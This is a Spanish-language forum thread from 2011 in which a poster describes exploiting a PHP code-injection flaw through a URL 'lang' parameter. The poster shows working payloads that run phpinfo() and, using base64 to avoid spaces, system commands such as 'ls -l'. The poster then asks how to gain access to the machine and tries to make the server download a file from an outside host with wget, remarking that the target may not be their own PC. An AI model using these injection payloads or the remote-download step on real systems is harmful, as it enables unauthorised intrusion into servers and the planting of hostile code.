PHP injection

Iniciado por chusrubi2, 10 Junio 2011, 01:41 AM

0 Miembros y 1 Visitante están viendo este tema.

chusrubi2

Buenas.

Bueno pues estoy intentado utilizar un ataque php injection. Esta es mi situación:


1.-http://localhost/?lang=${@phpinfo()}   FUNCIONA / http://localhost/?lang=http//localhost/phpinfo.txt NO FUNCIONA (obviamente tiene el código php para mostrar el phpinfo).

2.-Me puse a toquetear y a investigar http://localhost/?lang=${@system(ls -l)} NO FUNCIONA, al no funcionar me sale el típico error 500 y me añade %20 en la url (espacio).
Así que pensé en utilizar base64.

3.-http://localhost/?lang=${@system(base64_decode(bHMgLWw))} FUNCIONA

Ahora es aquí donde me atasco. Qué debería hacer para acceder a la máquina. He estado leyendo y hay que subir archivos con wget etc, pero es que no encuentro la fórmula de cómo poner la url ni que archivo subir.

Thanks.  ;D

chusrubi2

Bueno si he sido capaz de utilizar el system(ls -l), obviamente es linux. Particularmente:
System   Linux PERSEO 2.6.18-53.el5 #1 SMP Mon Nov 12 02:22:48 EST 2007 i686

Pero no estoy muy familiarizado con la consola de linux (solo lo básico, instalar programas etc).

¿Qué comandos, y de qué manera debería ponerlos en la url para acceder?

Gracias.

Edito: he estado investigando un poco y he empezado a usar el wget como prueba. Lo que he hecho es simplemente escribir system(wget) y sí me sale que tengo que poner la url despues del wget, pero por el problema de los espacios lo he hecho en base64.
Lo que he hecho ha sido: system(base64_decode(XXXCODEENBASE64))
XXXCODEENBASE64=wget xxx.com/phpinfo.txt
Pero no funciona, se tira todo el rato cargando y no hace nada...

Shell Root

Pues no se que quieres hacer, pero... el wget lo puedes hacer desde la misma consola de tu PC
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

chusrubi2

#3
Quiero subir un archivo (en el caso en el que no sea mi pc).
Nada intento el wget host.com/file.txt (en base64) y nada la web no carga...
¿Qué otra cosa puedo hacer?